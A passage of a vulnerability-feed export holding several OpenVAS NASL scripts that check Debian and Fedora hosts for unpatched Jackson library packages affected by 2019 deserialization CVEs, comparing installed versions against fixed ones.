USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891943\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2019-14540\", \"CVE-2019-16335\", \"CVE-2019-16942\", \"CVE-2019-16943\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-10-03 02:00:14 +0000 (Thu, 03 Oct 2019)\");\n script_name(\"Debian LTS: Security Advisory for jackson-databind (DLA-1943-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/10/msg00001.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-1943-1\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/940498\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/941530\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jackson-databind'\n package(s) announced via the DLA-1943-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"More deserialization flaws were discovered in jackson-databind\nrelating to the classes in com.zaxxer.hikari.HikariConfig,\ncom.zaxxer.hikari.HikariDataSource, commons-dbcp and\ncom.p6spy.engine.spy.P6DataSource, which could allow an\nunauthenticated user to perform remote code execution. The issue was\nresolved by extending the blacklist and blocking more classes from\npolymorphic deserialization.\");\n\n script_tag(name:\"affected\", value:\"'jackson-databind' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n2.4.2-2+deb8u9.\n\nWe recommend that you upgrade your jackson-databind packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libjackson2-databind-java\", ver:\"2.4.2-2+deb8u9\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libjackson2-databind-java-doc\", ver:\"2.4.2-2+deb8u9\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-14T14:48:53", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-01-09T00:00:00", "type": "openvas", "title": "Fedora Update for jackson-core FEDORA-2019-cf87377f5f", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-16942", "CVE-2019-14540", "CVE-2019-16943", "CVE-2019-16335"], "modified": "2020-01-13T00:00:00", "id": "OPENVAS:1361412562310877212", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310877212", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.877212\");\n script_version(\"2020-01-13T11:49:13+0000\");\n script_cve_id(\"CVE-2019-14540\", \"CVE-2019-16335\", \"CVE-2019-16942\", \"CVE-2019-16943\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-13 11:49:13 +0000 (Mon, 13 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-09 07:32:09 +0000 (Thu, 09 Jan 2020)\");\n script_name(\"Fedora Update for jackson-core FEDORA-2019-cf87377f5f\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC31\");\n\n script_xref(name:\"FEDORA\", value:\"2019-cf87377f5f\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Q7CANA7KV53JROZDX5Z5P26UG5VN2K43\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jackson-core'\n package(s) announced via the FEDORA-2019-cf87377f5f advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Core part of Jackson that defines Streaming API as well\nas basic shared abstractions.\");\n\n script_tag(name:\"affected\", value:\"'jackson-core' package(s) on Fedora 31.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC31\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"jackson-core\", rpm:\"jackson-core~2.10.0~1.fc31\", rls:\"FC31\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-15T14:41:17", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-10-12T00:00:00", "type": "openvas", "title": "Fedora Update for jackson-annotations FEDORA-2019-b171554877", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-16942", "CVE-2019-14540", "CVE-2019-16943", "CVE-2019-16335"], "modified": "2019-10-15T00:00:00", "id": "OPENVAS:1361412562310876900", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876900", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876900\");\n script_version(\"2019-10-15T06:42:05+0000\");\n script_cve_id(\"CVE-2019-14540\", \"CVE-2019-16335\", \"CVE-2019-16942\", \"CVE-2019-16943\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-10-15 06:42:05 +0000 (Tue, 15 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-10-12 02:30:23 +0000 (Sat, 12 Oct 2019)\");\n script_name(\"Fedora Update for jackson-annotations FEDORA-2019-b171554877\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC30\");\n\n script_xref(name:\"FEDORA\", value:\"2019-b171554877\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6DWXRMZMLNYP6T5RFMNNHUVSQYNFRUTQ\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jackson-annotations'\n package(s) announced via the FEDORA-2019-b171554877 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Core annotations used for value types,\nused by Jackson data-binding package.\");\n\n script_tag(name:\"affected\", value:\"'jackson-annotations' package(s) on Fedora 30.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC30\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"jackson-annotations\", rpm:\"jackson-annotations~2.10.0~1.fc30\", rls:\"FC30\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-15T14:37:45", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-10-12T00:00:00", "type": "openvas", "title": "Fedora Update for jackson-core FEDORA-2019-b171554877", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-16942", "CVE-2019-14540", "CVE-2019-16943", "CVE-2019-16335"], "modified": "2019-10-15T00:00:00", "id": "OPENVAS:1361412562310876901", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876901", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876901\");\n script_version(\"2019-10-15T06:42:05+0000\");\n script_cve_id(\"CVE-2019-14540\", \"CVE-2019-16335\", \"CVE-2019-16942\", \"CVE-2019-16943\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-10-15 06:42:05 +0000 (Tue, 15 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-10-12 02:30:27 +0000 (Sat, 12 Oct 2019)\");\n script_name(\"Fedora Update for jackson-core FEDORA-2019-b171554877\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC30\");\n\n script_xref(name:\"FEDORA\", value:\"2019-b171554877\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TH5VFUN4P7CCIP7KSEXYA5MUTFCUDUJT\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jackson-core'\n package(s) announced via the FEDORA-2019-b171554877 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Core part of Jackson that defines Streaming API as well\nas basic shared abstractions.\");\n\n script_tag(name:\"affected\", value:\"'jackson-core' package(s) on Fedora 30.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC30\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"jackson-core\", rpm:\"jackson-core~2.10.0~1.fc30\", rls:\"FC30\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-15T14:37:45", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-10-12T00:00:00", "type": "openvas", "title": "Fedora Update for jackson-parent FEDORA-2019-b171554877", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-16942", "CVE-2019-14540", "CVE-2019-16943", "CVE-2019-16335"], "modified": "2019-10-15T00:00:00", "id": "OPENVAS:1361412562310876904", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876904", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876904\");\n script_version(\"2019-10-15T06:42:05+0000\");\n script_cve_id(\"CVE-2019-14540\", \"CVE-2019-16335\", \"CVE-2019-16942\", \"CVE-2019-16943\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-10-15 06:42:05 +0000 (Tue, 15 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-10-12 02:30:35 +0000 (Sat, 12 Oct 2019)\");\n script_name(\"Fedora Update for jackson-parent FEDORA-2019-b171554877\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC30\");\n\n script_xref(name:\"FEDORA\", value:\"2019-b171554877\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/N2KHDT3IPBKLVBRWQXAKXQXCTFG6W4UX\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jackson-parent'\n package(s) announced via the FEDORA-2019-b171554877 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Project for parent pom for all Jackson components.\");\n\n script_tag(name:\"affected\", value:\"'jackson-parent' package(s) on Fedora 30.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC30\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"jackson-parent\", rpm:\"jackson-parent~2.10~1.fc30\", rls:\"FC30\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-14T14:48:55", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-01-09T00:00:00", "type": "openvas", "title": "Fedora Update for jackson-parent FEDORA-2019-cf87377f5f", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-16942", "CVE-2019-14540", "CVE-2019-16943", "CVE-2019-16335"], "modified": "2020-01-13T00:00:00", "id": "OPENVAS:1361412562310877267", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310877267", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.877267\");\n script_version(\"2020-01-13T11:49:13+0000\");\n script_cve_id(\"CVE-2019-14540\", \"CVE-2019-16335\", \"CVE-2019-16942\", \"CVE-2019-16943\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-13 11:49:13 +0000 (Mon, 13 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-09 07:34:49 +0000 (Thu, 09 Jan 2020)\");\n script_name(\"Fedora Update for jackson-parent FEDORA-2019-cf87377f5f\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC31\");\n\n script_xref(name:\"FEDORA\", value:\"2019-cf87377f5f\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PE6C23MULONYJO2LUE3KAPVXR7HUU4EH\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jackson-parent'\n package(s) announced via the FEDORA-2019-cf87377f5f advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Project for parent pom for all Jackson components.\");\n\n script_tag(name:\"affected\", value:\"'jackson-parent' package(s) on Fedora 31.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC31\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"jackson-parent\", rpm:\"jackson-parent~2.10~1.fc31\", rls:\"FC31\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-14T14:48:50", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-01-09T00:00:00", "type": "openvas", "title": "Fedora Update for jackson-databind FEDORA-2019-cf87377f5f", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-16942", "CVE-2019-14540", "CVE-2019-16943", "CVE-2019-16335"], "modified": "2020-01-13T00:00:00", "id": "OPENVAS:1361412562310877322", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310877322", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.877322\");\n script_version(\"2020-01-13T11:49:13+0000\");\n script_cve_id(\"CVE-2019-14540\", \"CVE-2019-16335\", \"CVE-2019-16942\", \"CVE-2019-16943\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-13 11:49:13 +0000 (Mon, 13 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-09 07:38:04 +0000 (Thu, 09 Jan 2020)\");\n script_name(\"Fedora Update for jackson-databind FEDORA-2019-cf87377f5f\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC31\");\n\n script_xref(name:\"FEDORA\", value:\"2019-cf87377f5f\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/A5OXHI43AG2UWCSTYYTASAVK2VIHIJDS\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jackson-databind'\n package(s) announced via the FEDORA-2019-cf87377f5f advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The general-purpose data-binding functionality and tree-model for Jackson Data\nProcessor. It builds on core streaming parser/generator package, and uses\nJackson Annotations for configuration.\");\n\n script_tag(name:\"affected\", value:\"'jackson-databind' package(s) on Fedora 31.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC31\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"jackson-databind\", rpm:\"jackson-databind~2.10.0~1.fc31\", rls:\"FC31\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-14T14:48:49", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-01-09T00:00:00", "type": "openvas", "title": "Fedora Update for jackson-annotations FEDORA-2019-cf87377f5f", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-16942", "CVE-2019-14540", "CVE-2019-16943", "CVE-2019-16335"], "modified": "2020-01-13T00:00:00", "id": "OPENVAS:1361412562310877291", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310877291", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.877291\");\n script_version(\"2020-01-13T11:49:13+0000\");\n script_cve_id(\"CVE-2019-14540\", \"CVE-2019-16335\", \"CVE-2019-16942\", \"CVE-2019-16943\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-13 11:49:13 +0000 (Mon, 13 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-09 07:36:14 +0000 (Thu, 09 Jan 2020)\");\n script_name(\"Fedora Update for jackson-annotations FEDORA-2019-cf87377f5f\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC31\");\n\n script_xref(name:\"FEDORA\", value:\"2019-cf87377f5f\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DQPRDZIY5XBP6IGPQ7VJUVJUSO7PAMSH\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jackson-annotations'\n package(s) announced via the FEDORA-2019-cf87377f5f advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Core annotations used for value types,\nused by Jackson data-binding package.\");\n\n script_tag(name:\"affected\", value:\"'jackson-annotations' package(s) on Fedora 31.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC31\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"jackson-annotations\", rpm:\"jackson-annotations~2.10.0~1.fc31\", rls:\"FC31\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-14T14:48:52", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-01-09T00:00:00", "type": "openvas", "title": "Fedora Update for jackson-bom FEDORA-2019-cf87377f5f", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-16942", "CVE-2019-14540", "CVE-2019-16943", "CVE-2019-16335"], "modified": "2020-01-13T00:00:00", "id": "OPENVAS:1361412562310877119", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310877119", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective 